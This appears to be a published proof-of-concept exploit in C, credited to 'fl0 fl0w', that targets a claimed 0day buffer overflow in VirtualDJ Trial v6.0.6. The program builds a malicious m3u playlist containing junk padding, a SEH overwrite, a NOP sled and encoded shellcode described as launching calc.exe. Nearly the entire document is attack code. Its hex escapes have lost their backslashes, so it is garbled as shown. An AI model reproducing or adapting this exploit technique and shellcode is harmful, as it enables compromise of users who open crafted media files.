VirtualDJ Trial v6.0.6 "New Year Edition" m3u Exploit (0day) :
/*VirtualDJ Trial v6.0.6 "New Year Edition" PC (0day)
This is a poc for the latest VJ
by fl0 fl0w
# Author: fl0 fl0w
# Tested on: Windows xp sp2
# Code : [exploit code]*/
#include<stdio.h>
#include<windows.h>
#include<string.h>
#include<getopt.h>
#include<unistd.h>
/*----prototypes---*/
int fileCreate(char*);
int bufferWrite();
int cpy(char*,char*);
char* path();
/*----prototypes---*/
#define BUFFSIZE 10000
char file[]=
"x23x56x69x72x74x75x61x6Cx44x4Ax20x50x6Cx61x79x6C" //header
"x69x73x74x0Dx0Ax23x4Dx69x78x54x79x70x65x3Dx53x6D"
"x61x72x74x0Dx0Ax49x3Ax5Cx41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" //junk
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x66x72x41x51x42x63x38x57x73x61x31x78"
"x77x77x77x77" //next seh handler offset is 1089 bytes
"x66x66x66x66" //Seh handler offset is 1093 bytes
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" //NOP sleed
"x90x90x90x90x90x90x90x90"
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49" //shellcode calc.exe offset 1116 bytes
"x49x49x49x49x49x49x49x49x49x49x49x51x5ax37x6ax63"
"x58x30x42x30x50x42x6bx42x41x73x41x42x32x42x41x32"
"x41x41x30x41x41x58x38x42x42x50x75x38x69x69x6cx38"
"x68x41x54x77x70x57x70x75x50x6ex6bx41x55x55x6cx6e"
"x6bx43x4cx66x65x41x68x45x51x58x6fx4cx4bx50x4fx62"
"x38x6ex6bx41x4fx31x30x36x61x4ax4bx41x59x6cx4bx74"
"x74x6ex6bx44x41x4ax4ex47x41x4bx70x6fx69x6cx6cx4c"
"x44x4bx70x43x44x76x67x4bx71x4ax6ax66x6dx66x61x39"
"x52x5ax4bx4ax54x75x6bx62x74x56x44x73x34x41x65x4b"
"x55x4ex6bx73x6fx54x64x53x31x6ax4bx35x36x6cx4bx64"
"x4cx30x4bx6cx4bx73x6fx57x6cx75x51x6ax4bx6cx4bx37"
"x6cx6cx4bx77x71x68x6bx4cx49x71x4cx51x34x43x34x6b"
"x73x46x51x79x50x71x74x4cx4bx67x30x36x50x4cx45x4b"
"x70x62x58x74x4cx6cx4bx53x70x56x6cx4ex6bx34x30x47"
"x6cx4ex4dx6cx4bx70x68x37x78x58x6bx53x39x6cx4bx4f"
"x70x6cx70x53x30x43x30x73x30x6cx4bx42x48x77x4cx61"
"x4fx44x71x6bx46x73x50x72x76x6bx39x5ax58x6fx73x4f"
"x30x73x4bx56x30x31x78x61x6ex6ax78x4bx52x74x33x55"
"x38x4ax38x69x6ex6cx4ax54x4ex52x77x79x6fx79x77x42"
"x43x50x61x70x6cx41x73x64x6ex51x75x52x58x31x75x57x70x63"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x30x4Bx4Bx7Ax69x2Ex6Dx70x33"; //tale
/*----main*--------*/
int main(int argc,char* argv[]){
fileCreate("666.m3u");
printf("DONE!
");
getchar();
return 0;
}
/*----main*--------*/
int fileCreate(char* fname){
FILE *fp;
char buffer[BUFFSIZE];
cpy(file,buffer);
fp=fopen(fname,"wb");
fprintf(fp,"%s",buffer);
if(fp<0){ printf("File error
");exit(0);}
return 0;}
int cpy(char* source,char* dest){
int len;
len=strlen(source);
memcpy(dest,source,len+1);
return len;}